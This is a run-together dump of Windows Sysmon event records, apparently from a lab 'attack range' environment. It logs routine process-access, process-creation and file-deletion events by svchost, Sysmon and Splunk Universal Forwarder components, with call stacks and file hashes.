10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1185-6216-5704-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1185-6216-5704-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.116{4F8D34B0-1185-6216-5704-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:46.584{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A7229F4A0E9FB49A9CEF1DED64BB282,SHA256=B8661C6A2ACEEDAE5016B38EEED4FEF88AA8BCB029D51690DA6573B3C1D8D0C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:46.449{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE240B82A667C1E6BB0841DB78EC63C0,SHA256=313D5E2CC9A020F349204912834B4FA316A9634C18D3753F6D9948A0244D6CBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:46.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=552D1E6C9C5D9AE91A7BF1F00A3CEF0F,SHA256=289C39276BAFC66AEBD30C65A9996F968EDF05062966B60BB8738FB1238FE1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:46.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED1715A7E4075380AD26960B8EFBC773,SHA256=4D0F0D827CEAAEDCC52E8D2372D8FE5723E67710005FB26AABC7B930FEA66E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:47.621{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A07B8E420F3C1779BC82EE7E58CB26A,SHA256=A8CDB7962E432C7350724343240665ECEC753ADAF0DDF3A042518F49088F032B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1187-6216-5A04-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1187-6216-5A04-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.772{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1187-6216-5A04-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.773{4F8D34B0-1187-6216-5A04-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.584{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B7EB3148735378DDF89DBE74752123,SHA256=332BF2D69EA50CB7ECC4342D529C264BB487F4B8BD7A8953DCDAD82EE1B514F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.522{4F8D34B0-1187-6216-5904-000000003902}12163436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1187-6216-5904-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 